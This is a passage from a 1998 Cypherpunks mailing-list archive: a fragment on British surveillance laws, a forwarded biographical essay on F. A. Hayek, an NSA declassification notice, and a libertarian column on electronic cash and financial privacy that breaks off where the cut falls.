filling in the few gaps in the wall of regulation and legislation the
Tories built around anyone who wasn't a middle-aged white  man who
worked 9 to 5, living in a suburb with a car and a mortgage,  who  never
went out.

Our current Home Secretary (cabinet minister with responsibility for
police anong other things)  was probably the first person in such a
position in any major country who was brought up by a single mother on a
violent estate (what you'd call a housing project in America) and he
thinks he knows - no he *does* know - what most ordinary people in
environments like that want from life. So he proposes law after law to
make things better, to tell people how they ought to live, all with the
best of intentions. Curfews for children (you ask questions and he will
just come back at you and say "do you *really* think 9-year-old children
should be wandering around on their own at night, or in gangs?" to which
the honest answer is "no, but it's none of your business if they do").
Compulsory parenting education  for parents whose children commit
crimes. A national register of paedophiles - which is made public,  so a
couple of convicted child abusers, on being released from jail asked to
be taken back in again because their life wasn't safe outside.  Defining
email that goes outside the country as "export" so that writing about
bombs (or cryptography?) can come under the strategic arms export
regulations. And so on.

And all the while local councils put up cameras in every high street... 

And all the 


[...snip...]

> Secondly, it is much more important to focus law makers 
> on the FBI's "constantly pushing for everything they can
> get away with while talking BALANCE" behavior than to nickle
> and dime every law favoring the FBI.  They must be shown
> for their blatant lies rather than for their gray area behavior.
> Otherwise, it's a very very tough battle.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Oct 1998 19:41:16 +0800
To: cypherpunks@cyberpass.net
Subject: TCR9 -- A Soldier of the Great War
Message-ID: <v04011715b248df7c369f@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: CONSILRPT@aol.com
Date: Tue, 13 Oct 1998 04:44:22 EDT
To: "The Consilience Report" <consilience-report@lists.lyris.net>
Mime-Version: 1.0
Subject: TCR9 -- A Soldier of the Great War
List-Subscribe: <mailto:subscribe-consilience-report@lists.lyris.net>
List-Owner: <mailto:owner-consilience-report@lists.lyris.net>
Reply-To: CONSILRPT@aol.com
X-Message-Id: <bba934b5.362312e6@aol.com>
Sender: bounce-consilience-report-262839@lists.lyris.net
Precedence: bulk

____________________________________________________________


THE CONSILIENCE REPORT:

                                         A Bionomic Meditation
                                         Number Nine
                                         10/13/98

_____________________________________________________________

                                        A SOLDIER OF THE GREAT WAR



Last Waltz in Vienna
================

In the summer of 1918 the Great War was
grinding through its fourth year. Thirty millions
already dead or wounded -- or more --  no one
really knows -- and the wreck of Europe still
staggered on, like a blind man into oncoming
traffic.

In Italy the Austrian army was making its
last futile bid for a military victory with
an attack across the Piave River.  In ten
days they would lose 100,000 men -- twice
all the American deaths in Vietnam, but
barely a footnote in the endless slaughter
of WW1.

If you had been on the Italian front that June --
if you had been, say, young Ernest Hemingway
from Michigan, tending your ambulance -- and
had looked up at just the right time and place,
you might have seen one of the biplanes of that
era: an observation craft buzzing westward
from the Austrian lines.

The skinny boy-officer in the rear cockpit was a
spotter for an artillery regiment of the Austro-
Hungarian army.  He had dropped out of high
school in his senior year to enlist and experience
a small part of the catastrophe.

He was Lieutenant Friedrich August von Hayek,
eldest son of a distinguished family of the minor
Austrian nobility.  He was just nineteen years old
and, like all the young men so engaged that year,
had no good prospect of getting much older.

Hayek had been born in Vienna in 1899, in the
reign of "der Alte Kaiser," the Emperor Franz-
Joseph, next-to-last of the durable Habsburg
dynasty.

Unlike many of his age and class, Lt. von Hayek
survived his war.  He contracted malaria in the
long retreat in the fall of 1918 but made it back
-- thin and sick, but alive -- to a city that was no
longer the glittering capital of a polyglot empire.

Vienna was now just the largest city in the tiny
rump state of the Austrian Republic -- redundant,
impoverished, and on the edge of starvation. But
it still possessed enough intellectual and cultural
capital for one last burst of achievement before
the Nazis rolled in fifteen years later. Here, Hayek
considered his prospects in a changed world and
prepared to enter the University of Vienna.


A Shift of Attention
===============

His first love had been the natural sciences. His
grandfather had been a prominent ornithologist
and Hayek, like his father, had been a fervent
amateur botanist.  One of his brothers became
an anatomist, the other a chemist.

By the time he was sixteen he had progressed
from a collector's interest in taxonomy to
paleontology and evolutionary theory -- but the
war changed things. The experience of serving
in a multinational army, shifted his interest from
the natural to the social sciences.

As he drily remarked:

   I served in a battle in which eleven different
   languages were spoken. It's bound to draw
   your attention to the problems of social
   organiization.

As unbearable as 1914-1918 had been, events
were already in motion to ensure that the rest
of the horrible twentieth century arrived on
schedule.

Austria's senior ally --  the other Kaiser -- had
just put the Russian emigre Vladimir Ulyanov
(nom de guerre: Lenin) into a sealed train bound
for St Petersburg,  like a plague bacillus into the
artery of a sick man.  And within a year another
Austrian veteran, Adolph Hitler, would make his
way to Vienna, tramping through a rougher
neighborhood than Hayek's, completing his own
education among the crackpots and anti-semites
that had long been flourishing like weeds in the
brilliant but decadent capital.

Europe, broken and bleeding, waited patiently
while the scenery was shifted and the principal
players learned their lines for the next act. Hayek
had little to do with that -- few would be ready to
listen to him or his ideas until the National Socialists
and Communists had shot their bolt, and not many
even then.


Some Piety
=========

We would like to think that everyone knows
of, and esteems Hayek but, for the benefit of
students arriving late here is a brief recitation:

F. A. Hayek (1899-1992) was one of the foremost
economists of this century before he morphed into
a later and even more important career as a social
and political philosopher.  He won the Nobel prize
in economics in 1974 and America's presidential
Medal of Freedom in 1991.

Those are some of the bare facts as they are
cited in reference books, but there is much more
to be said: He was a mighty scholar, an original
thinker, a gentleman in a nearly-forgotten sense
of that word.

Above all, he was a man of unflinching moral
courage who did as much as anyone to keep the
idea of individual freedom alive.  In an age when
many of our leaders have tried to tell us that
liberty is an embarrassing relic of another age --
something that we should happily trade in for
something shinier -- our nation, or our race, or
equality, or security, or social justice, or some
other fabulous chimera -- Hayek quietly,
persistently said: No, we won't.

For that, and for other things, we owe him.

Hayek had a long and useful life, doing important
work on into his 70s and 80s, but he won't quite
have made it into his centenary year of 1999. We
expect that hosannahs will be going up from all of
the various libertarian enclaves as his 100th birth-
day approaches, but TCR would like to be among
the first to pay our respects.

We expect we will need two or three more essays
to talk about his life and work, connect it to our
present concerns, and to try to make it clear that
he is somewhat more than just another dead
economist.

There's something to be said for the old Greek
ideal of piety -- civic reverence toward what
has gone before -- and if anyone in our century
deserves a bit of that,  it is certainly he.


London
======

Between the wars, even before the Nazis would
have made his departure obligatory, Hayek left
Vienna and alighted in London, a place he found
very much to his liking.

In 1895, Sidney and Beatrice Webb, doyen and
doyenne of English socialism, had founded the
London School of Economics and Political Science,
intending for it to be the West Point of their sect.
But things had loosened up a bit, and Lionel
Robbins, the moderate scholar who headed the
economics department, decided that a young
visiting lecturer from Vienna was a comer.

Robbins discovered that Hayek, notwithstanding
his anti-socialist views, seemed to  know more
about the history of the English monetary system
than any man in England. His English was passable
and he was a genial, well-bred sort -- "clubbable"
as the English say.  Robbins offered young
Dr Hayek a faculty position.

LSE didn't have quite the cachet of Oxford or
Cambridge but, for a young foreigner whose
own country offered poor prospects, it was a
plum.


The Great Debate
=============

In the small world that concerned itself with
economic theory, Hayek emerged in the early
Thirties as the great rival of John Maynard
Keynes.  In the journals, they conducted a public
debate about monetary and fiscal policy and
what, if anything, economists (and the governments
they advised), could do about the Great Depression
that seemed to be swallowing up the wealth of
the planet.

Keynes, brilliant and charismatic, had dabbled
in several fields, but now believed he had
solved the problem of booms and busts -- what
the economists genteelly referred to as "economic
fluctuations." When Keynes published his  _Treatise
on Money_, Hayek, uncharismatic but persistent,
fired back with a series of penetrating criticisms.
Later Keynes extended his ideas in_The General
Theory of Employment, Credit, and Money_,
and again Hayek returned fire.

Personally, Keynes and Hayek became
good friends, sharing a passion for history
and book collecting.  Publicly, they fought on.

As we all know, Keynes won the debate and
Hayek lost it, or so it seemed at the time, as
governments gravitated to Keynesianism.
Then came the Second War, which seemed
to justify extension of government control over
whatever bits of their economies that central
planners in Washington and London had not
already comandeered to fight the depression.

We can't pause here to consider the substance
of the Keynes-Hayek debate (and aren't compe-
tent to do so), except perhaps to say that it was
rooted in a basic conceptual clash about whether
macroeconomics as proposed by Keynes and
others really made any sense.

Hayek (and the Austrian school from which
he sprang) held that the aggregate measurements
of economic activity -- which Keynes proposed
to track and control through state action --were
statistical illusions that could only mislead policy-
makers about microeconomic reality.

Later, Hayek himself said of the great debate:

   In the middle 1940s... I was known as one of the
   two main disputing economists: there was Keynes
   and there was I . Now Keynes died and became
   a saint; and I discredited myself by publishing
   _The Road to Serfdom ...


A Discreditable Book
================

In the summer of 1939, even after Austria's
annexation by Hitler,  Hayek took train across
Europe for his annual holiday in the Austrian
Alps. He was a vigorous forty and an experienced
mountaineer, confident that even if war befell, he
could walk out of the country across the mountains,
depending on his skills and knowledge to reach
Switzerland.

He did his best thinking in the mountains and
here, perhaps, in Nazified Austria, he mapped
out his own little piece of the next war.  He had
seen, at closer-hand than his English colleagues,
the extinction of liberal Europe, the ascendency
of barbarism, and the steps by which it had
been wrought.  He had already published a little
article called "Freedom and the Economic
System" in a popular magazine. It contained
the germ for an argument he knew many people
wouldn't want to hear.

His loyalty was to England now, but he
began to wonder if his new countrymen really
understood how easily their liberty could slip
through their fingers.

An ex-enemy alien, with a German accent
and a "von" in front of his name was not
considered a suitable candidate for a government
post -- it would have involved PR problems that
Mr Churchill didn't need.  So Robbins and Keynes
became government advisors, while Hayek
taught. His contribution to the war effort was
philosophical and polemical rather than
bureaucratic. And, as it turned out, the war
that preoccupied his thougtsa wasn't precisely
the same one that the English thought they
were fighting.

In his spare time between 1940 and 1943 he
wrote _The Road to Serfdom_, and published
it in Britain in 1944.  It was a book that nearly
ruined his reputation as an economist and set
his life on a new course.


On the Road
=========

When Hayek was awarded the Nobel prize in
1974, the first reaction of many was surprise
that he was still alive. A few recalled that he
had debated Keynes many years ago, then he
had published a polemic that upset everyone
and wrecked his career. Where had he been?

Unlike his friend and rival Keynes, Hayek
didn't think of himself as a wit. When he
dedicated RTS to "The Socialists of All Parties,"
he was not being arch or ironical. They were
precisely the people he was addressing. If it was
a polemic, it was an uncommonly polite one.

In a long and disputatious life Hayek always
carefully attributed only seemly motives
to his opponents -- never suggesting that they
sought anything but the good and the true. In
his own case it may have been so, but he was a
very unusual man. His opponents were often
not so delicate.

What he told them, in fine, was that he believed
in their good intentions:

   There can be no doubt that most socialists
   still believe profoundly in the liberal ideal of
   freedom and that they would recoil if they
   became convinced that the realization of
   their program would mean the destruction
   of freedom.

Then, for two hundred pages, he tried to so
convince them and bring about that recoil.

He argued that the planned economies to which
so many well-meaning people had pinned their
hopes for a better world would inevitably and
tragically lead to a worse one. That all of their
ideas had already been tried in Germany or Russia
or both. That the results were there for anyone
with the eyes to see them. That their good intentions
would not save them.

The book was written by an Austro-Englishman
specifically to warn his new countrymen -- full of
examples and arguments calculated to move
an English mind. It received a respectful hearing
there, where Hayek was something of a minor
public figure. It never occurred to him that it
would become a popular best-seller in the United
States, where he was completely unknown.

When Hayek arrived in the United States in the
spring of 1945, he was planning to lecture to
audiences of economists at a few universities.
Instead, he discovered that RTS had been
published not just by the scholarly University
of  Chicago Press, but had been condensed in
The Readers' Digest, the largest-circulation
magazine of its day, then re-printed in a cheap
edition as a Book-of-the-Month. In the pre-
television, pre-Internet world of 1945 it was a
media blitz.

He was astounded to discover that he was an
instant celebrity.  In New York, instead of
lecturing to a few professors he found himself
addressing an overflow crowd in a 3000-seat
auditorium, and carried live on network radio.


Aftermath
========

It would be pleasant to report that the socialists
of all parties had actually been persuaded, or at
least cowed, by RTS, but of course no such
thing happened. Not then, and not now.

Hayek had his bewildering few weeks of
American celebrity, and here and there RTS
penetrated deeply.  Hayek continued to work
and write, spent time in the United States and
in  liberated Europe, and did what he could to
marshal a revival of what he quaintly still insisted
on calling "liberalism."

His American critics, calling themselves
liberals, insisted that he was a reactionary
conservative and an enemy of progress. A
comedy of errors that persists to this day.

Although Hayek and RTS outlived many
critics -- always the most satisfactory way
to win an argument -- there were plenty of
them.

One of the three American commercial
publishers that rejected the book found
it so politically repulsive that they reportedly
said it was "unfit for publication by a
reputable house."

As he recalled it:

   The English socialists, with few exceptions,
   accepted the book as something written in
   good faith...In America it was wholly
   different... The great enthusiasm about the
   New Deal was still at its height...the American
   intelligentsia...felt that this was a betrayal of
   the highest ideals which intellectuals ought to
   defend. So I was exposed to incredible abuse...
   It went so far as to completely discredit me
   professionally.

When efforts were made to bring Hayek to the
University of Chicago a few years later, the
school's economists rose in angry disdain.
Hayek had to settle for a berth with the
prestigious Committee on Social Thought,
where he was pointedly not expected to
profess economics.

It was only in 1974 when he made his trip
to Stockholm to receive his Nobel gong,
that there was a general revival of interest
in the forgotten man.

And there the tale will have to rest for now.


Postscript and Preview
=================

At the Fourth Bionomics Conference in 1996,
Eric B. Baum of the NEC Research Institute gave
a workshop on genetic algorithms, featuring
a program he called "The Hayek Machine." The
name was not whimsical -- it pointed back to an
obscure book by Hayek called _The Sensory Order_,
a foray by the economist into theoretical psychology --
published in 1952, but based on notions he had
sketched out in the 1920s.

Genetic algorithms are a subset of artificial
intelligence research, but they also have important
implications for economics, psychology, biology,
and other disciplines. Baum's Hayek1 and Hayek2
are "dumb" programs operating with limited infor-
mation about their environment, but which manage
to solve complex problems. It is Adam Smith's
Invisible Hand, as enriched by F. A. Hayek and
formalized by cutting-edge computer science.

We think the value of history is self-evident, but our
interest in Hayek is mainly forward-looking. He tried,
very persuasively, to show us the social world as a
field of self-organizing institutions co-evolving in an
almost Darwinian fashion -- what he called
spontaneous order.

Hayek's work anticipated and partly inspired
research now being carried out in many disciplines.
It implies a world-view that is still inchoate and hard
to encapsule in a word or a phrase.  "Complex
self-organizing systems" catches some of it. But it
could just as well be called simply Hayekian.

It also happens to be a way of looking at things
that is congenial to libertarians.  If the social
world were not, in fact, essentially Hayekian, then
order could never arise spontaneously.  But
our growing understanding of complex systems
in many contexts is confirming the reasonings and
intuitions of Hayek.  Our human world is a place
where order need not be imposed by planners and
despots -- a world where a free society operating
within an impersonal framework of basic rules
is an available option.

As intimated above, we hope to tease out various
Hayekian insights in future TCRs: spontaneous
organization, the role of information in the economy,
and his re-thinking of the problem of constitutional
govenment, among others.

And along the way: an occasional nod of gratitude
to the old soldier himself.

======================================

Resources:

1.  A Soldier of the Great War

Our title was swiped from the excellent novel
of the same name by Mark Helprin. It is a
fictional reminiscence of an old man who, in his
youth, fought with the Italian Army in World
War One. A convenient way to learn something
about that war, which also happens to be a fine
piece of writing.


2.  Hayek had been born in Vienna...

There are several biographical sketches of Hayek
here and there, but no proper biography exists.

For this essay we relied heavily on  _Hayek on
Hayek: An Autobiographical Dialogue Edited
by Stephen Kresge and Leif Wenar_.

It has been cobbled together from several tape-
recorded interviews with Hayek  in the 1970s
and '80s, and gives us Hayek in his own words.

It's a companion to the collected works of
Hayek, being published in 20-odd volumes by
University of Chicago Press with the support
of a dozen classical liberal/libertarian groups
in several countries, including Cato and the
Reason Foundation.

The introduction by Stephen Kresge is the best
short summary of Hayek's life and works that
we know of. The book includes some wonderful
photos, including young FAH in the regalia of
an Austrian officer, and writing al fresco in the
Alps.

All extended Hayek quotes arefrom this work.

Available from Amazon  (1994 HC edition)
for $27.50:

   http://www.amazon.com/exec/obidos/ASIN/
      0226320626/002-2884821-8302613


2a.  The Hayek Interviews

One of the tapes included in _Hayek on Hayek_
is a 1977 interview conducted by Prof. Tom
Hazlett.  It was printed in Reason magazine in
1992 following Hayek's death.

Available at:

  http://www.reasonmag.com/hayekint.html

Also, for those who want to see and hear the
man himself, several recordings are available
from the Idea Channel. Selected clips can be
seen/heard for no charge at their website:

   http://www.ideachannel.com/HayekDiscussions.htm


3.  The Hayek-Keynes Debate

No short piece can resolve this tangled and very
theoretical fifty-year-old controversy.

The most lucid and concise account of this
dispute (for non-economists) we know of is an
essay by Fritz Machlup in _Essays on Hayek_
(1976).

Machlup is another eminent Austrian
who taught at Princeton and is a past president
of the American Economics Association. He is
sympathetic to Hayek but fair to Keynes.

The book is, unfortunately, out of print, but
probably not difficult to find.

As to the final fate of Keynes, we can only note
that his reputation is much diminished in
recent years, while Hayek's has risen. At the 1997
convention of the American Economics Association,
there was a session called "Is there a Core of Practical
Macroeconomcs That We Should all Believe?,"
suggesting that there is considerable disarray in the
macro school which was once confident that it was
smart enough to not only understand but "fine-tune"
modern economies.

See also:

Ben W. Bolch, "Is Macroeconomics Believable?"
in The Independent Review, vol 2, No4 (Spring 1998).


4.  _The Road to Serfdom_

The fiftieth anniversary edition was published
by University of Chicago in 1994, and is still
in print.  It includes a new introduction by
Hayek's friend and fellow Nobel laureate
Milton Friedman and Hayek's lengthy preface
to the 1956 edition.

RTS has been roundly praised, here and elsewhere,
as a classic, and it surely is. But it should be noted
that much of the book's argument turns on people,
issues and events of the 30s and 40s which some
readers born after WW II may find a bit murky.

The "classical" central-planning socialism
criticized by Hayek in 1944 has been succeeded
by socialism "lite" -- the pervasive regulate-and-
redistribute regimes with which we cope at
century's-end, and a bit of translation is required
to see that it is the same vinegary wine in a new
bottle. A reader who wants a short, sharp
summing-up adjusted for recent fashions in
statism might prefer _The Fatal Conceit_
(1989), Hayek's parting shot in his ninetieth year.

No single book encompasses all of Hayek's
thought, but those who are not much interested
in technical economics, are pressed for time, and
want to read the best single, systematic statement
of Hayek's philosophy might better take up his
_The Constitution of Liberty_ (1960).

RTS is available for a paltry $8.76 from Amazon
at

   http://www.amazon.com/exec/obidos/ASIN/
      0226320618/o/qid=908170736/sr=2-1/
      002-2884821-8302613

CoL  (1978 trade PB edition) is $19.95:

   http://www.amazon.com/exec/obidos/ASIN/
      0226320847/qid%3D908170912/
      002-2884821-8302613

TFC (1991 trade PB edition) is $12.00:
   http://www.amazon.com/exec/obidos/ASIN/
      0226320669/r/002-2884821-8302613


4.   The "Hayek" genetic algorithm program...

A brief abstract of Dr Baum's presentation is
available at:

   http://www.bionomics.org/text/events/conf96/
      abstracts/abBowlBaum.html


5.  Hayek on the Web

There are a number of good Hayekian resources
on the Net, but the only one you really need is the
excellent Friedrich Hayek Scholars' Page at

   http://members.aol.com/gregransom/
        hayekpage.htm

It's maintained by Professor Greg Ransom of Mira
Costa College, and contains links to every substantial
bit of Hayekiana on the Web.  A cornucopia.

==============================================

TCR is published by Steve Hyde and John LeGere, and written,
more often than not, by John LeGere..

Comments, brickbats, and inquiries can be addressed to
us at CONSILRPT@aol.com

Please feel free to forward this issue to whomever you please,
leaving our boilerplate intact.

If you know discerning people who would like to receive TCR,
send a subscription request to CONSILRPT@aol.com.

===============================================



---
You are currently subscribed to consilience-report as: [rah@shipwright.com]
To unsubscribe, forward this message to
leave-consilience-report-262839E@lists.lyris.net

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 13 Oct 1998 19:53:29 +0800
To: cypherpunks@toad.com
Subject: NSA Declassifications
Message-ID: <199810131106.HAA09415@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Forward:

A selection of National Security Agency declassification decisions is
offered at

        http://www.fas.org/sgp/othergov/nsa/index.html

___________________
Steven Aftergood
Project on Government Secrecy
Federation of American Scientists

http://www.fas.org/sgp/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Oct 1998 20:15:39 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] Boiling the frog: Much will depend on 'electronic money'
Message-ID: <v04011719b248e6cdefda@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
From: "ScanThisNews" <mcdonalds@airnet.net>
To: ignition-point@majordomo.pobox.com
Subject: IP: [FP] Boiling the frog: Much will depend on 'electronic money'
Date: Mon, 12 Oct 1998 20:27:18 -0500
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: "ScanThisNews" <mcdonalds@airnet.net>

======================================================================
SCAN THIS NEWS
10/11/98

[Forwarded message]


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED OCT. 4, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    Boiling the frog: Much will depend on the new 'electronic money'

EDITORS: A version of this feature first appeared in the October edition of
Las Vegas Magazine.

    An Internet press release (how trendy) from the folks at MasterCard
International, datelined "Purchase, N.Y., July 22, 1998," informs us:

  "MasterCard International hosted today an online forum with thought
leaders from global business, government and research organizations to
discuss lifestyle changes that will occur as smart card technology gains
acceptance over the next five years.

  "Representatives from IBM, Hitachi, British Telecommunications plc, the
U.S. federal government's General Services Administration, The Tower Group
and Emerge Online participated in the roundtable, which was moderated by
Richard Phillimore, Senior Vice President of MasterCard's Chip Card
Business unit.

  "'Five years from now, multi-application smart cards will be an
established technology in the payments business,' Phillimore said. 'As the
benefits of multi-application smart cards are proven in the marketplace,
the conversion from magnetic stripe to chip-based payment cards will be
very rapid. By the year 2010, we expect all of MasterCard's credit and
debit cards and terminals will be chip-based.'

  "Smart cards will deliver increased consumer value and utility to today's
credit cards, Phillimore added. 'Chip technology will enable cardholders to
use their cards for many more purposes, such as electronic ticketing,
loyalty programs, and secure remote shopping -- a true Lifestyle Card that
can be tailored to meet the unique needs and  preferences of a single
individual.'"

  When mentioning those ominous-sounding "loyalty programs," I should point
out, the online MasterCard gang are referring not to government loyalty
oaths of the "am not now and never have been a member of the Communist
Party" variety, but rather a system in which cardholders receive discounts
for "loyally" shopping through one company -- the system probably familiar
to most consumers today via those "discount club cards" issued by your
supermarket, offering you 30 cents off a package of toilet paper if you let
the teller scan your card at the checkout stand.

  Of course, the store gets something back in return for that discount. In
addition to the obvious hope that you'll keep going back to the store whose
discount card you carry (essentially, a surcharge is being applied to
"hoppers" who show no store loyalty), the management can now easily track
how many of its outlets you visit, and what you buy there.

  The initial commercial applications may be innocent enough -- "Let's save
postage by only sending coupons for this new brand of breakfast cereal to
the home addresses of our shoppers who already buy the more expensive
competitor." But you don't have to be the kind who walks stooped over to
avoid the black helicopters to foresee the day when the government
inspectors may arrive, asking to see the electronic profiles of all
customers in a given geographic area who have used the fast-spreading cards
to buy anything from home AIDS test kits to hydroponic "grow lights" to
"High Times" magazine to pistol ammunition.

 It's all stored in the computer, you know. And how long do you think Jack,
your friendly local produce manager, is really going to refuse to let the
FBI access his computer without a court order? About as long as it takes
them to ask for his Social Security number and threaten to call their
friends at the IRS, suggesting Jack may be in need of an immediate tax
audit?

  The cheerful little MasterCard press release doesn't take long to broach
the subject of "expanded uses" for the new cards with their embedded memory
chips:

  "The panel also addressed the use of smart cards for identification
purposes. Many agreed that identification was the 'killer application' that
would encourage adoption of smart card programs. Kotaro Yamashita, COO of
Financial Services at Hitachi, Ltd. said, 'We see identification
applications issued by governments as being big in many places outside of
Asia, for example Central America.' However, Marty Wagner, Associate
Administrator of the Office of Government wide Policy at the U.S. General
Services Administration (GSA) cautioned that 'National identity card
programs could run into trouble in the U.S. due to privacy concerns.' "


    #   #   #

 The process of accustoming Americans to carrying around cards which can be
used to buy anything from a candy car to a soda pop to a round-trip airline
ticket to London -- but whose embedded chips will also relay to corporate
and government snoops the social security number and other personal
information (and resultant tax obligations) of anyone making that purchase
-- is well underway.

  There's an old folk warning that if you throw a frog in boiling water he
will quickly jump out. But if you put a frog in a pan of cold water and
raise the temperature ever so slowly, the gradual warming will make the
frog doze happily, triggering the soporific response he instinctively
displays when the sun shines on his lily pad ... In fact, the frog will
eventually cook to death, without ever waking up.

 Likewise, some mighty high-powered public relations types are figuring
ways to emphasize the convenience of "electronic cash" - and downplay the
effect it may have in removing any remaining privacy from the way you spend
your pay.

  The goal? To cook the frog, without any ruckus.

  Convenience, convenience, convenience, was the happy spin Time magazine
put on a new "single electronic card that may replace everything in your
wallet," in their issue of April 27, 1998. As the magazine was listing all
the bothersome stuff you now have to lug around - cash, ATM cards, credit
cards, proof of insurance - it made a not-so-subtle swipe at anyone who
would resist the happy consolidation of such burdens:

 "Your ID cards. PRESENT: You lug various bits of your legal identity.
FUTURE: Non-conspiracists could consolidate pertinent info in one place."

  Get that? If you don't want the government tax man to see your bank
balance and a record of how many times you've flown to Zurich or the Cayman
Islands, if you don't want the theater manager to see your alimony payments
or your concealed-carry handgun permit, if you don't want your boss to see
your prescription for post-cancer-surgery drugs, if you don't want EVERYONE
to gain a precise accounting of how much you spent last month at
Frederick's of Hollywood, or renting X-rated videos, or shacked up in a
motel room across town, or purchasing alcoholic beverages, or buying
vaginal contraceptive foam (including which brand you prefer), why, you're
just some loony "conspiracist."

  Also note that "could" ... as though we'll still have any choice.

  But why worry? Digital cash will be great, argues Joshua Cooper Ramo in
the big "Future of Money" piece in the April 27 Time:

  "Think about the $2,000 check you send to your daughter at college for
expenses. How is that money really spent? Books ... or beer? Electronic
cash takes that relatively simple transaction -- passing an allowance --
and makes it into a much more intelligent process. ...

  "Your daughter can store the money any way she wants -- on her laptop, on
a debit card, even (in the not too distant future) on a chip implanted
under her skin. And, perhaps best of all, you can program the money to be
spent only in specific ways. You might instruct some of the digits to go
for books, some for food and some for movies. Unless you pass along a few
digits that can be cashed at the local pub, she'll have to find someone
else to buy the drinks."

  Ha ha. Kind of cute, isn't it? But look again. Isn't the underlying theme
one of "control"? Try substituting a different scenario for Mr. Ramo's. How
about: "Think about the $1,000 Social Security check your agency sends a
retiree in Las Vegas. How is that money really spent? Food and lodging ...
or blackjack, roulette, and Margaritas?"

  If the purpose of government retirement insurance is to make sure old
folks have food and a roof over their head, doesn't the government have an
OBLIGATION to "earmark" portions of those checks so they can only be used
to buy certain things, once the new e-cash technology gives them that
capability? Couldn't we set e-cards to freeze a recipient's account if she
tried to use any of the "money" to pay for a second prescription of pain
pills written by a doctor other than her ASSIGNED doctor, or to buy a
naughty book about how to evade taxes, or how to move money into offshore
accounts?

  For that matter, what if your boss started earmarking parts of your
electronic paycheck for rent or groceries -- at certain stores that pay for
the consideration -- all "for your own good," you understand? After all,
the kind of soccer moms who elected Bill Clinton can be counted on to favor
almost (start ital)any(end ital) additional Big Brother controls over those
irresponsible men in their lives, frittering away their paychecks on bar
tabs, dirty magazines, power tools, and fancy chrome doo-dads for their
pickup trucks.


    #   #   #

  Donald S. McAlvany, editor of the economic and geopolitical newsletter
"The McAlvany Intelligence Advisor," is a fellow who has been looking into
the move toward trackable "electronic cash" for some time. The lead article
in the July, 1998 edition of his 16-page newsletter is headlined "Toward a
Cashless Society: Implementing an Electronic Currency in America," and
spells out a very different view of these developing trends from the one
embraced by the jovial publicists at Time:

  "The global socialists who dominate America and most of the governments
of the western world today (especially Western Europe) have long had a goal
of moving the world away from the use of cash and into an electronic funds
currency system, wherein virtually all cash in use is 'electronic
currency,' " writes Mr. McAlvany. "If all financial transactions are forced
through an electronic banking system ... the ultimate 'people control'
system could be established. ..."

  Citing George Orwell's classic novel "1984," Mr. McAlvany reminds us:
"Privacy is a major element of freedom, without which people and nations
cannot remain free. Today, we have dozens of privacy-destroying systems
being put in place by governments all over the world. They include video
camera surveillance in public places; electronic eavesdropping on
computers, phones and faxes; dozens of computerized files on each adult
American - compiled from credit card, banking, and tax records; physical
surveillance of homes, in whole areas via satellite, helicopters, and other
aircraft; the growing use of Social Security numbers to extract all kinds
of information on Americans from  business, banking, and government data
cases; photo IDs required at airports; and the push by the Clinton
Administration for a computerized (smart card) national identification card
for all U.S. citizens.

  "But the greatest privacy-destroying system of all, one which would have
made Big Brother's, Adolf Hitler's, Mao's, Lenin's or Stalin's mouths water
is the elimination of cash and the forcing of all citizens into the
computerized banking system for (start ital)all(end ital) transactions.
Ultimately these transactions can be monitored, recorded, profiled, and
used in 'people control.' If all of your personal transactions can be so
tracked, a socialist government bent on identifying, profiling and
controlling its 'politically incorrect' citizens or 'religious fanatics' or
Bible-believing Christians; gun owners; critics of the government; non-tax
compliers, can easily scrutinize and build a profile on such individuals.
It can also, in the absence of a cash-spending alternative, deny the
privilege to buy and sell to those who are politically or religiously
incorrect."

  Since one of the main problems banks may have during the anticipated
computer crisis brought about by the turning of the century is clearing
checks written on other banks -- banks whose computers may not agree with
the home bank's "fix" for the transition from year date 99 to year date 00
-- Mr. McAlvany suggests that crisis might present a perfect opportunity to
effectively require bank customers to change over from paper checks to
"electronic cash."

  "Remember that during the financial crisis of the 1930s, when Franklin
Roosevelt presented the American people with the alternative of a bank
holiday/gold confiscation/Draconian financial controls (start ital)or(end
ital) financial destruction, they willingly chose the former and gave up a
major portion of their financial freedom."


    #   #   #

  The removal of cash, of course, will be advertised as having many
benefits. Since drug dealers buy and sell their product with suitcases full
of hundred-dollar bills, it will be alleged that the switch will end the
drug trade (as though a multi-billion-dollar industry won't promptly hire
both fancy accountants and computer geniuses to figure out how to "go
electronic" without throwing blips on the IRS radar screens -- or as though
they won't just add newly "illegal" hundred-dollar bills to the list of
contraband they now freely move outside official channels.)

  Expect a public relations campaign to expose the "health hazard" of all
those dirty pennies and nickels you have lying around the house. Passed
from hand to hand among AIDS patients and tuberculosis-ridden junkies, how
can you let your children handle such stuff? Instead, buy Sean and Alysson
a new pair of color-coordinated, his-and-hers Kiddie Smart Cards, which
neatly deduct exactly $1.77 from their accounts when they buy lunch at
school, without burdening them down with filthy, wasteful, inconvenient
(and expensive to produce) coins ... coins they might otherwise save up,
after all, to buy dirty magazines, or reefer, or who knows what else?

  Yep, it's all for your health, safety, and convenience. And why would
anyone object ... unless, of course, they had something to (start
ital)hide(end ital). What was your name again? And could I have your
18-digit bank tracking number, please? You (start ital)are(end ital) in
this country legally, aren't you? Not some kind of a federal
fugitive/deadbeat dad? There, that's better. See how easy things are when
you cooperate? Just slide your card through the security/debit slot. Now
